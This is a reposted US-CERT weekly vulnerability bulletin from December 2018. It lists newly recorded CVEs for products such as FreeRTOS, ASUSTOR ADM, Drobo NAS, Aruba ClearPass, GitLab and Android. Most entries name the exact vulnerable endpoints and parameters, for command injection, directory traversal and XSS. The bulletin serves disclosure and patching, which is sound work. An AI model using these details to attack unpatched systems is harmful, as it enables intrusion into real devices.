Tag Archives: Security

SB18-344: Vulnerability Summary for the Week of December 3, 2018

This post was originally published on this site

Original release date: December 10, 2018

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities correspond to the following scores:

  • High – Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 – 10.0

  • Medium – Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 – 6.9

  • Low – Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 – 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

The NCCIC Weekly Vulnerability Summary Bulletin is created using information from the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD). In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

 

High Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
There were no high vulnerabilities recorded this week.

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
metinfo — metinfo Metinfo 6.1.3 has reflected XSS via the admin/column/move.php lang_columnerr4 parameter. 2018-12-03 4.3 CVE-2018-19835
MISC

Back to top

 

Low Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
There were no low vulnerabilities recorded this week.

Back to top

 

Severity Not Yet Assigned

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
actiontec — c1000a_router Persistent Cross-Site Scripting (XSS) in the advancedsetup_websiteblocking.html Website Blocking page of the Actiontec C1000A router with firmware through CAC004-31.30L.95 allows a remote attacker to inject arbitrary HTML into the Website Blocking page by inserting arbitrary HTML into the ‘TodUrlAdd’ URL parameter in a /urlfilter.cmd POST request. 2018-12-06 not yet calculated CVE-2018-19922
MISC
amazon_web_services — freertos Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component allow information disclosure during parsing of ICMP packets in prvProcessICMPPacket. 2018-12-06 not yet calculated CVE-2018-16527
MISC
MISC
CONFIRM
amazon_web_services — freertos Amazon Web Services (AWS) FreeRTOS through 1.3.1 allows remote attackers to execute arbitrary code because of mbedTLS context object corruption in prvSetupConnection and GGD_SecureConnect_Connect in AWS TLS connectivity modules. 2018-12-06 not yet calculated CVE-2018-16528
MISC
MISC
CONFIRM
amazon_web_services — freertos An issue was discovered in Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component. Out of bounds memory access during parsing of DHCP responses in prvProcessDHCPReplies can be used for information disclosure. 2018-12-06 not yet calculated CVE-2018-16602
MISC
MISC
CONFIRM
amazon_web_services — freertos An issue was discovered in Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component. A crafted IP header triggers a full memory space copy in prvProcessIPPacket, leading to denial of service and possibly remote code execution. 2018-12-06 not yet calculated CVE-2018-16601
MISC
MISC
CONFIRM
amazon_web_services — freertos An issue was discovered in Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component. Out of bounds memory access during parsing of ARP packets in eARPProcessPacket can be used for information disclosure. 2018-12-06 not yet calculated CVE-2018-16600
MISC
MISC
CONFIRM
amazon_web_services — freertos An issue was discovered in Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component. In xProcessReceivedUDPPacket and prvParseDNSReply, any received DNS response is accepted, without confirming it matches a sent DNS request. 2018-12-06 not yet calculated CVE-2018-16598
MISC
MISC
CONFIRM
amazon_web_services — freertos An issue was discovered in Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component. Out of bounds memory access during parsing of NBNS packets in prvTreatNBNS can be used for information disclosure. 2018-12-06 not yet calculated CVE-2018-16599
MISC
MISC
CONFIRM
amazon_web_services — freertos Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component allow remote attackers to leak information or execute arbitrary code because of a Buffer Overflow during generation of a protocol checksum in usGenerateProtocolChecksum and prvProcessIPPacket. 2018-12-06 not yet calculated CVE-2018-16526
MISC
MISC
CONFIRM
amazon_web_services — freertos Amazon Web Services (AWS) FreeRTOS through 1.3.1 has an uninitialized pointer free in SOCKETS_SetSockOpt. 2018-12-06 not yet calculated CVE-2018-16522
MISC
MISC
CONFIRM
amazon_web_services — freertos An issue was discovered in Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component. Out of bounds access to TCP source and destination port fields in xProcessReceivedTCPPacket can leak data back to an attacker. 2018-12-06 not yet calculated CVE-2018-16603
MISC
MISC
CONFIRM
amazon_web_services — freertos Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component allow remote attackers to execute arbitrary code or leak information because of a Buffer Overflow during parsing of DNSLLMNR packets in prvParseDNSReply. 2018-12-06 not yet calculated CVE-2018-16525
MISC
MISC
CONFIRM
amazon_web_services — freertos Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component allow information disclosure during parsing of TCP options in prvCheckOptions. 2018-12-06 not yet calculated CVE-2018-16524
MISC
MISC
CONFIRM
amazon_web_services — freertos Amazon Web Services (AWS) FreeRTOS through 1.3.1, FreeRTOS up to V10.0.1 (with FreeRTOS+TCP), and WITTENSTEIN WHIS Connect middleware TCP/IP component allow division by zero in prvCheckOptions. 2018-12-06 not yet calculated CVE-2018-16523
MISC
MISC
CONFIRM
anker — nebula_capsule_pro_nbui_m1_devices Anker Nebula Capsule Pro NBUI_M1_V2.1.9 devices allow attackers to cause a denial of service (reboot of the underlying Android 7.1.2 operating system) via a crafted application that sends data to WifiService. 2018-12-08 not yet calculated CVE-2018-19980
MISC
antiy_labs — avl_atool Local attackers can trigger a stack-based buffer overflow on vulnerable installations of Antiy-AVL ATool security management v1.0.0.22. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the processing of IOCTL 0x80002000 by the IRPFile.sys Antiy-AVL ATool kernel driver. The bug is caused by failure to properly validate the length of the user-supplied data, which results in a kernel stack buffer overflow. An attacker can leverage this vulnerability to execute arbitrary code in the context of the kernel, which could lead to privilege escalation and a failed exploit could lead to denial of service. 2018-12-05 not yet calculated CVE-2018-19650
MISC
arm — mbed_tls Arm Mbed TLS before 2.14.1, before 2.7.8, and before 2.1.17 allows a local unprivileged attacker to recover the plaintext of RSA decryption, which is used in RSA-without-(EC)DH(E) cipher suites. 2018-12-05 not yet calculated CVE-2018-19608
MISC
CONFIRM
CONFIRM
artifex — mupdf In Artifex MuPDF 1.14.0, svg/svg-run.c allows remote attackers to cause a denial of service (recursive calls followed by a fitz/xml.c fz_xml_att crash from excessive stack consumption) via a crafted svg file, as demonstrated by mupdf-gl. 2018-12-05 not yet calculated CVE-2018-19881
MISC
MISC
artifex — mupdf In Artifex MuPDF 1.14.0, the svg_run_image function in svg/svg-run.c allows remote attackers to cause a denial of service (href_att NULL pointer dereference and application crash) via a crafted svg file, as demonstrated by mupdf-gl. 2018-12-05 not yet calculated CVE-2018-19882
MISC
MISC
aruba — access_points A vulnerability exists in the firmware of embedded BLE radios that are part of some Aruba Access points. An attacker who is able to exploit the vulnerability could install new, potentially malicious firmware into the AP’s BLE radio and could then gain access to the AP’s console port. This vulnerability is applicable only if the BLE radio has been enabled in affected access points. The BLE radio is disabled by default. Note – Aruba products are NOT affected by a similar vulnerability being tracked as CVE-2018-16986. 2018-12-07 not yet calculated CVE-2018-7080
BID
CONFIRM
aruba — clearpass A Remote Authentication bypass in Aruba ClearPass Policy Manager leads to complete cluster compromise. An authentication flaw in all versions of ClearPass could allow an attacker to compromise the entire cluster through a specially crafted API call. Network access to the administrative web interface is required to exploit this vulnerability. Resolution: Fixed in 6.7.6 and 6.6.10-hotfix. 2018-12-07 not yet calculated CVE-2018-7067
CONFIRM
aruba — clearpass Aruba ClearPass Policy Manager guest authorization failure. Certain administrative operations in ClearPass Guest do not properly enforce authorization rules, which allows any authenticated administrative user to execute those operations regardless of privilege level. This could allow low-privilege users to view, modify, or delete guest users. Resolution: Fixed in 6.7.6 and 6.6.10-hotfix. 2018-12-07 not yet calculated CVE-2018-7079
CONFIRM
aruba — clearpass An unauthenticated remote command execution exists in Aruba ClearPass Policy Manager on linked devices. The ClearPass OnConnect feature permits administrators to link other network devices into ClearPass for the purpose of collecting enhanced information about connected endpoints. A defect in the API could allow a remote attacker to execute arbitrary commands on one of the linked devices. This vulnerability is only applicable if credentials for devices have been supplied to ClearPass under Configuration -> Network -> Devices -> CLI Settings. Resolution: Fixed in 6.7.5 and 6.6.10-hotfix. 2018-12-07 not yet calculated CVE-2018-7066
CONFIRM
aruba — clearpass An authenticated SQL injection vulnerability in Aruba ClearPass Policy Manager can lead to privilege escalation. All versions of ClearPass are affected by multiple authenticated SQL injection vulnerabilities. In each case, an authenticated administrative user of any type could exploit this vulnerability to gain access to “appadmin” credentials, leading to complete cluster compromise. Resolution: Fixed in 6.7.6 and 6.6.10-hotfix. 2018-12-07 not yet calculated CVE-2018-7065
CONFIRM
aruba — clearpass In Aruba ClearPass, disabled API admins can still perform read/write operations. In certain circumstances, API admins in ClearPass which have been disabled may still be able to perform read/write operations on parts of the XML API. This can lead to unauthorized access to the API and complete compromise of the ClearPass instance if an attacker knows of the existence of these accounts. 2018-12-07 not yet calculated CVE-2018-7063
CONFIRM
asustor — adm Directory Traversal in downloadwallpaper.cgi in ASUSTOR ADM version 3.1.1 allows attackers to download arbitrary files by manipulating the “file” and “folder” URL parameters. 2018-12-04 not yet calculated CVE-2018-12314
MISC
asustor — adm Missing verification of a password in ASUSTOR ADM version 3.1.1 allows attackers to change account passwords without entering the current password. 2018-12-04 not yet calculated CVE-2018-12315
MISC
asustor — adm Denial-of-service in the login page of ASUSTOR ADM 3.1.1 allows attackers to prevent users from signing in by placing malformed text in the title. 2018-12-04 not yet calculated CVE-2018-12319
MISC
asustor — adm OS command injection in user.cgi in ASUSTOR ADM version 3.1.1 allows attackers to execute system commands as root via the “secret_key” URL parameter. 2018-12-04 not yet calculated CVE-2018-12312
MISC
asustor — adm Information disclosure in the SNMP settings page in ASUSTOR ADM version 3.1.1 allows attackers to obtain the SNMP password in cleartext. 2018-12-04 not yet calculated CVE-2018-12318
MISC
asustor — adm OS command injection in group.cgi in ASUSTOR ADM version 3.1.1 allows attackers to execute system commands as root by modifying the “name” POST parameter. 2018-12-04 not yet calculated CVE-2018-12317
MISC
asustor — adm OS Command Injection in upload.cgi in ASUSTOR ADM version 3.1.1 allows attackers to execute system commands by modifying the filename POST parameter. 2018-12-04 not yet calculated CVE-2018-12316
MISC
asustor — adm Cross-site scripting in File Explorer in ASUSTOR ADM version 3.1.1 allows attackers to execute JavaScript by uploading SVG images with embedded JavaScript. 2018-12-04 not yet calculated CVE-2018-12305
MISC
asustor — adm OS command injection in user.cgi in ASUSTOR ADM version 3.1.1 allows attackers to execute system commands as root via the “name” POST parameter. 2018-12-04 not yet calculated CVE-2018-12307
MISC
asustor — adm Cross-site scripting vulnerability in File Explorer in ASUSTOR ADM version 3.1.1 allows attackers to execute arbitrary JavaScript when a file is moved via a malicious filename. 2018-12-04 not yet calculated CVE-2018-12311
MISC
asustor — adm Cross-site scripting in the Login page in ASUSTOR ADM version 3.1.1 allows attackers to execute JavaScript via the System Announcement feature. 2018-12-04 not yet calculated CVE-2018-12310
MISC
asustor — adm Directory Traversal in upload.cgi in ASUSTOR ADM version 3.1.1 allows attackers to upload files to arbitrary locations by modifying the “path” URL parameter. NOTE: the “filename” POST parameter is covered by CVE-2018-11345. 2018-12-04 not yet calculated CVE-2018-12309
MISC
asustor — adm Encryption key disclosure in share.cgi in ASUSTOR ADM version 3.1.1 allows attackers to obtain the encryption key via the “encrypt_key” URL parameter. 2018-12-04 not yet calculated CVE-2018-12308
MISC
asustor — adm Directory Traversal in File Explorer in ASUSTOR ADM version 3.1.1 allows attackers to view arbitrary files by modifying the “file1” URL parameter, a similar issue to CVE-2018-11344. 2018-12-04 not yet calculated CVE-2018-12306
MISC
asustor — adm OS command injection in snmp.cgi in ASUSTOR ADM version 3.1.1 allows attackers to execute system commands without authentication via the “rocommunity” URL parameter. 2018-12-04 not yet calculated CVE-2018-12313
MISC
bastian_allgeier — kirby panel/login in Kirby v2.5.12 allows XSS via a blog name. 2018-12-04 not yet calculated CVE-2018-16628
MISC
brocade_communications — fabric_os A vulnerability in the proxy service of Brocade Fabric OS versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow remote unauthenticated attackers to obtain sensitive information and possibly cause a denial of service attack. 2018-12-03 not yet calculated CVE-2018-6440
CONFIRM
brocade_communications — fabric_os A vulnerability in the configdownload command of Brocade Fabric OS command line interface (CLI) versions before 8.2.1, 8.1.2f, 8.0.2f, 7.4.2d could allow a local attacker to escape the restricted shell and, gain root access. 2018-12-03 not yet calculated CVE-2018-6439
CONFIRM
cairo — cairo cairo 1.16.0, in cairo_ft_apply_variations() in cairo-ft-font.c, would free memory using a free function incompatible with WebKit’s fastMalloc, leading to an application crash with a “free(): invalid pointer” error. 2018-12-05 not yet calculated CVE-2018-19876
MISC
MISC
chipsbank_technologies — ump_tool ChipsBank UMPTool saves the password to the NAND with a simple substitution cipher, which allows attackers to get full access when having physical access to the device. 2018-12-03 not yet calculated CVE-2018-19795
MISC
cisco — energy_management_suite A vulnerability in the configuration of a local database installed as part of the Cisco Energy Management Suite (CEMS) could allow an authenticated, local attacker to access and alter confidential data. The vulnerability is due to the installation of the PostgreSQL database with unchanged default access credentials. An attacker could exploit this vulnerability by logging in to the machine where CEMS is installed and establishing a local connection to the database. The fix for this vulnerability randomizes the database access password in new installations; however, the fix will not change the password for existing installations. Users are required to manually change the password, as documented in the Workarounds section of this advisory. There are workarounds that address this vulnerability. 2018-12-04 not yet calculated CVE-2018-0468
BID
CISCO
MISC
cloud_foundry — cloud_foundry_nfs Cloud Foundry NFS volume release, 1.2.x prior to 1.2.5, 1.5.x prior to 1.5.4, 1.7.x prior to 1.7.3, logs the cf admin username and password when running the nfsbrokerpush BOSH deploy errand. A remote authenticated user with access to BOSH can obtain the admin credentials for the Cloud Foundry Platform through the logs of the NFS volume deploy errand. 2018-12-05 not yet calculated CVE-2018-15797
CONFIRM
crafter_software — crafter_cms A Server-Side Template Injection issue was discovered in Crafter CMS 3.0.18. Attackers with developer privileges may execute OS commands by Creating/Editing a template file (.ftl filetype) that triggers a call to freemarker.template.utility.Execute in the FreeMarker library during rendering of a web page. 2018-12-06 not yet calculated CVE-2018-19907
MISC
MISC
dell — encryption Dell Encryption (formerly Dell Data Protection | Encryption) v10.1.0 and earlier contain an information disclosure vulnerability. A malicious user with physical access to the machine could potentially exploit this vulnerability to access the unencrypted RegBack folder that contains back-ups of sensitive system files. 2018-12-05 not yet calculated CVE-2018-15773
MISC
domainmod — domainmod DomainMOD through 4.11.01 has XSS via the assets/add/registrar-accounts.php UserName, Reseller ID, or notes field. 2018-12-06 not yet calculated CVE-2018-19913
MISC
domainmod — domainmod DomainMOD through 4.11.01 has XSS via the assets/add/dns.php Profile Name or notes field. 2018-12-06 not yet calculated CVE-2018-19914
MISC
domainmod — domainmod DomainMOD through 4.11.01 has XSS via the assets/edit/host.php Web Host Name or Web Host URL field. 2018-12-06 not yet calculated CVE-2018-19915
MISC
domainmod — domainmod DomainMOD through 4.11.01 has XSS via the admin/dw/add-server.php DisplayName, HostName, or UserName field. 2018-12-05 not yet calculated CVE-2018-19892
MISC
drobo — 5n2_nas Incorrect access control in the /mysql/api/diags.php endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to retrieve diagnostic information via the “name” URL parameter. 2018-12-03 not yet calculated CVE-2018-14695
MISC
drobo — 5n2_nas Incorrect access control in the /mysql/api/drobo.php endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to retrieve sensitive system information. 2018-12-03 not yet calculated CVE-2018-14696
MISC
drobo — 5n2_nas Cross-site scripting in the /DroboAccess/enable_user endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows attackers to execute JavaScript via the username URL parameter. 2018-12-03 not yet calculated CVE-2018-14697
MISC
drobo — 5n2_nas Cross-site scripting in the /DroboAccess/delete_user endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows attackers to execute JavaScript via the “username” URL parameter. 2018-12-03 not yet calculated CVE-2018-14698
MISC
drobo — 5n2_nas System command injection in the /DroboAccess/enable_user endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to execute system commands via the “username” URL parameter. 2018-12-03 not yet calculated CVE-2018-14699
MISC
drobo — 5n2_nas Incorrect access control in the /mysql/api/droboapp/data endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to retrieve the MySQL database root password. 2018-12-03 not yet calculated CVE-2018-14703
MISC
drobo — 5n2_nas System command injection in the /DroboAccess/delete_user endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to execute system commands via the “username” URL parameter. 2018-12-03 not yet calculated CVE-2018-14701
MISC
drobo — 5n2_nas Incorrect access control in the /drobopix/api/drobo.php endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to retrieve sensitive system information. 2018-12-03 not yet calculated CVE-2018-14702
MISC
drobo — 5n2_nas Incorrect access control in the Dashboard API on Drobo 5N2 NAS version 4.0.5-13.28.96115 allows attackers to bypass authentication due to insecure token generation. 2018-12-03 not yet calculated CVE-2018-14709
MISC
drobo — 5n2_nas An insecure transport protocol used by Drobo Dashboard API on Drobo 5N2 NAS version 4.0.5-13.28.96115 allows attackers to intercept network traffic. 2018-12-03 not yet calculated CVE-2018-14708
MISC
drobo — 5n2_nas Directory traversal in the Drobo Pix web application on Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to upload files to arbitrary locations. 2018-12-03 not yet calculated CVE-2018-14707
MISC
drobo — 5n2_nas System command injection in the /DroboPix/api/drobopix/demo endpoint on Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to execute system commands via the payload in a POST request. 2018-12-03 not yet calculated CVE-2018-14706
MISC
drobo — 5n2_nas Incorrect access control in the /mysql/api/logfile.php endpoint in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows unauthenticated attackers to retrieve MySQL log files via the “name” URL parameter. 2018-12-03 not yet calculated CVE-2018-14700
MISC
drobo — 5n2_nas Cross-site scripting in the MySQL API error page in Drobo 5N2 NAS version 4.0.5-13.28.96115 allows attackers to execute JavaScript via a malformed URL path. 2018-12-03 not yet calculated CVE-2018-14704
MISC
f5 — big-ip The svpn component of the F5 BIG-IP APM client prior to version 7.1.7.2 for Linux and macOS runs as a privileged process and can allow an unprivileged user to get ownership of files owned by root on the local client host in a race condition. 2018-12-06 not yet calculated CVE-2018-15332
BID
CONFIRM
foreman — foreman A cross-site scripting (XSS) flaw was found in the foreman component of satellite. An attacker with privilege to create entries using the Hosts, Monitor, Infrastructure, or Administer Menus is able to execute a XSS attacks against other users, possibly leading to malicious code execution and extraction of the anti-CSRF token of higher privileged users. Foreman before 1.18.3, 1.19.1, and 1.20.0 are vulnerable. 2018-12-07 not yet calculated CVE-2018-16861
CONFIRM
freebsd — freebsd In FreeBSD before 11.2-STABLE(r340854) and 11.2-RELEASE-p5, an integer overflow error when handling opcodes can cause memory corruption by sending a specially crafted NFSv4 request. Unprivileged remote users with access to the NFS server may be able to execute arbitrary code. 2018-12-04 not yet calculated CVE-2018-17157
SECTRACK
MISC
FREEBSD
freebsd — freebsd In FreeBSD before 11.2-STABLE(r340854) and 11.2-RELEASE-p5, an integer overflow error can occur when handling the client address length field in an NFSv4 request. Unprivileged remote users with access to the NFS server can crash the system by sending a specially crafted NFSv4 request. 2018-12-04 not yet calculated CVE-2018-17158
SECTRACK
MISC
FREEBSD
freebsd — freebsd In FreeBSD before 11.2-STABLE(r340854) and 11.2-RELEASE-p5, the NFS server lacks a bounds check in the READDIRPLUS NFS request. Unprivileged remote users with access to the NFS server can cause a resource exhaustion by forcing the server to allocate an arbitrarily large memory allocation. 2018-12-04 not yet calculated CVE-2018-17159
SECTRACK
MISC
FREEBSD
freebsd — freebsd In FreeBSD before 11.2-STABLE(r341486) and 11.2-RELEASE-p6, insufficient bounds checking in one of the device models provided by bhyve can permit a guest operating system to overwrite memory in the bhyve host possibly permitting arbitrary code execution. A guest OS using a firmware image can cause the bhyve process to crash, or possibly execute arbitrary code on the host as root. 2018-12-04 not yet calculated CVE-2018-17160
FREEBSD
freeswitch — freeswitch FreeSWITCH through 1.8.2, when mod_xml_rpc is enabled, allows remote attackers to execute arbitrary commands via the api/system or txtapi/system (or api/bg_system or txtapi/bg_system) query string on TCP port 8080, as demonstrated by an api/system?calc URI. This can also be exploited via CSRF. Alternatively, the default password of works for the freeswitch account can sometimes be used. 2018-12-06 not yet calculated CVE-2018-19911
MISC
MISC
freeware_advanced_audio_coder — freeware_advanced_audio_coder An invalid memory address dereference was discovered in the huffcode function (libfaac/huff2.c) in Freeware Advanced Audio Coder (FAAC) 1.29.9.2. The vulnerability causes a segmentation fault and application crash, which leads to denial of service in the book 4 case. 2018-12-05 not yet calculated CVE-2018-19887
MISC
freeware_advanced_audio_coder — freeware_advanced_audio_coder An invalid memory address dereference was discovered in the huffcode function (libfaac/huff2.c) in Freeware Advanced Audio Coder (FAAC) 1.29.9.2. The vulnerability causes a segmentation fault and application crash, which leads to denial of service in the book 10 case. 2018-12-05 not yet calculated CVE-2018-19891
MISC
freeware_advanced_audio_coder — freeware_advanced_audio_coder An invalid memory address dereference was discovered in the huffcode function (libfaac/huff2.c) in Freeware Advanced Audio Coder (FAAC) 1.29.9.2. The vulnerability causes a segmentation fault and application crash, which leads to denial of service in the book 2 case. 2018-12-05 not yet calculated CVE-2018-19890
MISC
freeware_advanced_audio_coder — freeware_advanced_audio_coder An invalid memory address dereference was discovered in the huffcode function (libfaac/huff2.c) in Freeware Advanced Audio Coder (FAAC) 1.29.9.2. The vulnerability causes a segmentation fault and application crash, which leads to denial of service in the HCB_ESC case. 2018-12-05 not yet calculated CVE-2018-19888
MISC
freeware_advanced_audio_coder — freeware_advanced_audio_coder An invalid memory address dereference was discovered in the huffcode function (libfaac/huff2.c) in Freeware Advanced Audio Coder (FAAC) 1.29.9.2. The vulnerability causes a segmentation fault and application crash, which leads to denial of service in the book 6 case. 2018-12-05 not yet calculated CVE-2018-19889
MISC
freeware_advanced_audio_coder — freeware_advanced_audio_coder An invalid memory address dereference was discovered in the huffcode function (libfaac/huff2.c) in Freeware Advanced Audio Coder (FAAC) 1.29.9.2. The vulnerability causes a segmentation fault and application crash, which leads to denial of service in the book 8 case. 2018-12-05 not yet calculated CVE-2018-19886
MISC
general_electric — proficy_cimplicity_gds XXE in GE Proficy Cimplicity GDS versions 9.0 R2, 9.5, 10.0 2018-12-07 not yet calculated CVE-2018-15362
BID
MISC
gitlab — community_and_enterprise_edition An issue was discovered in GitLab Community Edition 11.x before 11.1.8, 11.2.x before 11.2.5, and 11.3.x before 11.3.2. There is Information Exposure via Epic change descriptions. 2018-12-04 not yet calculated CVE-2018-17976
CONFIRM
CONFIRM
gitlab — community_and_enterprise_edition An issue was discovered in GitLab Community and Enterprise Edition before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It has Cleartext Storage of Sensitive Information. 2018-12-04 not yet calculated CVE-2018-18641
CONFIRM
CONFIRM
gitlab — community_and_enterprise_edition An issue was discovered in GitLab Community and Enterprise Edition before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It has XSS. 2018-12-04 not yet calculated CVE-2018-18642
CONFIRM
CONFIRM
gitlab — community_and_enterprise_edition An issue was discovered in GitLab Community and Enterprise Edition before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It has Information Exposure Through an Error Message. 2018-12-04 not yet calculated CVE-2018-18648
CONFIRM
CONFIRM
gitlab — community_and_enterprise_edition An issue was discovered in GitLab Community and Enterprise Edition 11.x before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It allows Information Exposure via a Gitlab Prometheus integration. 2018-12-04 not yet calculated CVE-2018-18644
CONFIRM
CONFIRM
gitlab — community_and_enterprise_edition An issue was discovered in GitLab Community and Enterprise Edition before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It allows SSRF. 2018-12-04 not yet calculated CVE-2018-18646
CONFIRM
CONFIRM
gitlab — community_and_enterprise_edition An issue was discovered in GitLab Community Edition 11.x before 11.1.8, 11.2.x before 11.2.5, and 11.3.x before 11.3.2. There is Information Exposure via the GFM markdown API. 2018-12-04 not yet calculated CVE-2018-17975
CONFIRM
CONFIRM
gitlab — community_and_enterprise_edition An issue was discovered in GitLab Community and Enterprise Edition before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It has Missing Authorization. 2018-12-04 not yet calculated CVE-2018-18647
CONFIRM
CONFIRM
gitlab — community_and_enterprise_edition An issue was discovered in GitLab Community and Enterprise Edition 11.1.x before 11.1.8, 11.2.x before 11.2.5, and 11.3.x before 11.3.2. There is Information Exposure via the merge request JSON endpoint. 2018-12-04 not yet calculated CVE-2018-17939
CONFIRM
CONFIRM
gitlab — community_and_enterprise_edition An issue was discovered in GitLab Community and Enterprise Edition before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It has Information Exposure Through Browser Caching. 2018-12-04 not yet calculated CVE-2018-18640
CONFIRM
CONFIRM
gitlab — community_and_enterprise_edition An issue was discovered in GitLab Community and Enterprise Edition before 11.2.7, 11.3.x before 11.3.8, and 11.4.x before 11.4.3. It allows for Information Exposure via unsubscribe links in email replies. 2018-12-04 not yet calculated CVE-2018-18645
CONFIRM
CONFIRM
gitlab — enterprise_edition The Kubernetes integration in GitLab Enterprise Edition 11.x before 11.2.8, 11.3.x before 11.3.9, and 11.4.x before 11.4.4 has SSRF. 2018-12-04 not yet calculated CVE-2018-18843
CONFIRM
CONFIRM
gnu — binutils An issue was discovered in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils through 2.31. There is an integer overflow and infinite loop caused by the IS_CONTAINED_BY_LMA macro in elf.c. 2018-12-07 not yet calculated CVE-2018-19932
MISC
MISC
gnu — binutils An issue was discovered in the Binary File Descriptor (BFD) library (aka libbfd), as distributed in GNU Binutils through 2.31. There is a heap-based buffer overflow in bfd_elf32_swap_phdr_in in elfcode.h because the number of program headers is not restricted. 2018-12-07 not yet calculated CVE-2018-19931
MISC
MISC
gnu — c_library In the GNU C Library (aka glibc or libc6) through 2.28, attempting to resolve a crafted hostname via getaddrinfo() leads to the allocation of a socket descriptor that is not closed. This is related to the if_nametoindex() function. 2018-12-04 not yet calculated CVE-2018-19591
BID
SECTRACK
FEDORA
FEDORA
CONFIRM
CONFIRM
CONFIRM
google — android In lppTransposer of lpp_tran.cpp there is a possible out of bounds write due to missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-112160868. 2018-12-06 not yet calculated CVE-2018-9549
BID
CONFIRM
google — android In V4L2SliceVideoDecodeAccelerator::Dequeue of v4l2_slice_video_decode_accelerator.cc, there is a possible out of bounds read of a function pointer due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-8.1 Android-9. Android ID: A-112181526. 2018-12-06 not yet calculated CVE-2018-9538
BID
CONFIRM
google — android In CAacDecoder_Init of aacdecoder.cpp, there is a possible out-of-bound write due to a missing bounds check. This could lead to remote code execution in the media server with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-9. Android ID: A-112891548. 2018-12-06 not yet calculated CVE-2018-9551
BID
CONFIRM
google — android In ihevcd_sao_shift_ctb of ihevcd_sao.c there is a possible out of bounds write due to missing bounds check. This could lead to information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-7.0 Android-7.1.1 Android-7.1.2 Android-8.0 Android-8.1 Android-9. Android ID: A-113260892. 2018-12-06 not yet calculated CVE-2018-9552
BID
CONFIRM
